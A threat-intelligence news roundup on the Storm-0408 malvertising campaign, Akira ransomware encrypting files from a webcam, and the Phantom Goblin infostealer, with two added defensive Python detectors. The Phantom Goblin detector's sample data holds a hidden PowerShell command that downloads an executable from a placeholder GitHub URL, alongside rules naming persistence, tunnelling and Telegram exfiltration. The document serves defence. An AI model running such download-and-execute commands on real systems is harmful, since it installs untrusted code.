TRENDING TOPICS MAR 07, 2025

Update: Microsoft Disrupts Massive Malvertising Campaign Using GitHub for Malware Distribution

Microsoft has dismantled a large-scale malvertising campaign that compromised nearly one million devices worldwide, leveraging GitHub, Dropbox, and Discord as malware distribution platforms. The attack, tracked as Storm-0408, involved injecting malicious ads into illegal streaming websites and redirecting victims through multiple intermediary sites before ultimately delivering malware from attacker-controlled GitHub repositories. The first-stage payload was designed to conduct system reconnaissance, collect detailed device information, and deploy additional malware, including Lumma Stealer, the Doenerium infostealer, and NetSupport RAT, which enabled remote control and credential theft. The infection chain was highly structured, with multiple redirection layers and the use of PowerShell, JavaScript, VBScript, and AutoIT scripts to evade detection and establish persistence. Attackers also leveraged living-off-the-land binaries and scripts (LOLBAS), including PowerShell.exe, MSBuild.exe, and RegAsm.exe, to facilitate command execution, data exfiltration, and the bypassing of security software. Microsoft has since removed the malicious GitHub repositories, but the campaign’s scope highlights the growing use of legitimate cloud services for malware distribution. With cybercriminals continually refining malvertising and SEO poisoning tactics, organizations should remain vigilant against threats that exploit trusted platforms for malicious activity.

Update: Akira Ransomware Exploits Unsecured Webcam to Evade EDR and Encrypt Network

The Akira ransomware gang has been observed using an unsecured webcam as an alternative attack pathway after its initial encryption attempts were blocked by Endpoint Detection and Response (EDR) software. The attackers first accessed the victim’s network through an exposed remote access solution, which can include webcams, likely using stolen credentials or brute-force attacks. After infiltrating the environment, they deployed AnyDesk for remote access, moved laterally using RDP, and attempted to launch their ransomware payload. EDR, however, quarantined the encryptor, forcing Akira to look for less monitored devices within the network. Instead of abandoning the attack, the group scanned the network for alternative entry points and found a Linux-based webcam that lacked security monitoring and EDR protection. By exploiting unpatched vulnerabilities, Akira gained remote shell access to the webcam and used its Linux operating system to mount Windows SMB network shares. This allowed them to run their Linux encryptor from the webcam, encrypting files across the network while bypassing security defenses. The victim’s security team remained unaware of the attack, because the webcam’s unmonitored SMB traffic never triggered an alert. This incident highlights the growing risk of IoT devices in ransomware attacks: they often remain unpatched, unmonitored, and integrated into sensitive networks. Organizations must isolate IoT devices from production environments, apply regular firmware updates, and expand threat monitoring to non-traditional endpoints to prevent similar exploitation. This case also reinforces the limitations of relying solely on EDR, as adversaries find creative ways to evade detection and execute ransomware attacks.
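As an added illustration (not code from the article or from the incident responders), the following Python snippet shows the monitoring gap the Akira case exposes: it scans NetFlow-style records and flags SMB sessions into the file-server segment whose source has no EDR agent or sits in the IoT VLAN. The IP ranges, host inventory and flow records are all constructed assumptions for the example.

```python
import ipaddress
from dataclasses import dataclass

SMB_PORTS = {139, 445}

@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    bytes_out: int

# Constructed inventory for the example (not from the article): hosts with an
# EDR agent, the IoT VLAN a webcam would live in, and the file-server segment.
EDR_MANAGED = {"10.0.1.10", "10.0.1.11", "10.0.1.12"}
IOT_VLAN = ipaddress.ip_network("10.0.50.0/24")
FILE_SERVERS = ipaddress.ip_network("10.0.20.0/24")

# Constructed flow records: two normal workstation sessions, an IoT device
# pushing large SMB volumes at two servers, and unrelated IoT DNS traffic.
SAMPLE_FLOWS = [
    Flow("10.0.1.10", "10.0.20.5", 445, 120_000),
    Flow("10.0.1.11", "10.0.20.5", 445, 8_000),
    Flow("10.0.50.23", "10.0.20.5", 445, 9_500_000),
    Flow("10.0.50.23", "10.0.20.6", 445, 7_200_000),
    Flow("10.0.50.40", "8.8.8.8", 53, 300),
]

def find_unmanaged_smb(flows, managed=EDR_MANAGED, iot=IOT_VLAN, servers=FILE_SERVERS):
    """Group SMB flows into the server segment by source and keep only sources
    that have no EDR coverage or sit in the IoT VLAN. Returns {src: finding}."""
    findings = {}
    for f in flows:
        if f.dport not in SMB_PORTS or ipaddress.ip_address(f.dst) not in servers:
            continue
        in_iot = ipaddress.ip_address(f.src) in iot
        if f.src in managed and not in_iot:
            continue  # covered endpoint talking SMB to a file server: expected
        entry = findings.setdefault(f.src, {
            "reason": "IoT VLAN host using SMB" if in_iot else "SMB from host without EDR",
            "targets": set(), "bytes_out": 0})
        entry["targets"].add(f.dst)
        entry["bytes_out"] += f.bytes_out
    return findings

if __name__ == "__main__":
    for src, finding in find_unmanaged_smb(SAMPLE_FLOWS).items():
        print(f"{src}: {finding['reason']} -> {sorted(finding['targets'])} ({finding['bytes_out']} bytes)")
```

In a real deployment the managed-host set would come from the EDR console's agent inventory, so any SMB source absent from it is by definition a blind spot.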


Phantom Goblin Malware Uses Social Engineering and VSCode Tunnels for Stealthy Data Theft

A newly identified malware campaign, Phantom Goblin, uses social engineering to distribute information-stealing malware and gain unauthorized access to systems. The malware is delivered through spam emails carrying RAR attachments that contain a malicious LNK file disguised as a PDF document. Once executed, the shortcut runs a PowerShell command that downloads additional payloads from GitHub and establishes persistence by modifying Windows registry entries so the malware executes at startup. The payloads, named “updater.exe,” “vscode.exe,” and “browser.exe,” are designed to look like legitimate applications, making detection difficult. Phantom Goblin primarily targets web browsers and developer tools, stealing cookies, login credentials, and browsing history; it forcefully terminates browser processes and bypasses Chrome’s App Bound Encryption (ABE) to extract this data. The stolen information is then archived and transmitted to a Telegram bot via the Telegram Bot API for covert exfiltration. A key feature of this operation is its use of Visual Studio Code (VSCode) tunnels to establish unauthorized remote access: the malware downloads and extracts a legitimate copy of VSCode, then uses PowerShell scripts to create a persistent tunnel that lets attackers retain access without triggering traditional security alerts. To mitigate this stealthy attack, organizations should block the execution of unexpected PowerShell scripts, restrict unauthorized VSCode tunnel creation, and monitor outbound network traffic for suspicious Telegram API activity. Deploying advanced email filtering and endpoint security with real-time behavioral analysis can help detect and block malicious processes before they establish persistence.
As malware operations grow more sophisticated, understanding these evolving attack techniques is critical to stopping data exfiltration and unauthorized system access before they cause widespread damage. 
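Added example, not code from the article or from any vendor: a small Python detector that turns the mitigations above into rules over Sysmon-style events and flags hosts on which several stages of the Phantom Goblin chain appear together (an Explorer-launched PowerShell fetching from GitHub, a Run-key entry pointing into AppData or Temp, a `code.exe tunnel` launch, and egress to api.telegram.org). Event fields, host names, paths and command lines are constructed assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style telemetry (not from the article): ws01 shows the
# full chain, ws02 shows ordinary admin PowerShell and browser traffic.
SAMPLE_EVENTS = [
    {"host": "ws01", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c iwr https://github.com/placeholder/repo/raw/main/updater.exe"
                " -OutFile $env:TEMP\\updater.exe"},
    {"host": "ws01", "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vscode",
     "value": r"C:\Users\u\AppData\Local\Temp\vscode.exe"},
    {"host": "ws01", "type": "process", "parent": "powershell.exe", "image": "code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms"},
    {"host": "ws01", "type": "network", "image": "browser.exe", "dest_host": "api.telegram.org", "dport": 443},
    {"host": "ws02", "type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},
    {"host": "ws02", "type": "network", "image": "chrome.exe", "dest_host": "update.googleapis.com", "dport": 443},
]

# Each rule maps one stage of the chain to a predicate over a single event.
# explorer.exe as parent is the heuristic for "user double-clicked a shortcut".
RULES = {
    "lnk_powershell_download": lambda e: e["type"] == "process" and e["image"] == "powershell.exe"
        and e["parent"] == "explorer.exe"
        and re.search(r"(iwr|invoke-webrequest|downloadfile).*github\.com", e["cmdline"], re.I),
    "run_key_persistence": lambda e: e["type"] == "registry"
        and re.search(r"\\CurrentVersion\\Run\\", e["key"], re.I)
        and re.search(r"\\(AppData|Temp)\\", e["value"], re.I),
    "vscode_tunnel": lambda e: e["type"] == "process" and e["image"] == "code.exe"
        and re.search(r"\btunnel\b", e["cmdline"], re.I),
    "telegram_api_egress": lambda e: e["type"] == "network" and e["dest_host"] == "api.telegram.org",
}

def detect_stages(events):
    """Return {host: set of stage names} for every host with at least one hit."""
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].add(name)
    return dict(hits)

def flag_hosts(events, min_stages=2):
    """Hosts where min_stages or more distinct stages co-occur; a single stage
    (e.g. one legitimate VSCode tunnel) is left for analyst review instead."""
    return {h: sorted(s) for h, s in detect_stages(events).items() if len(s) >= min_stages}
```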

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.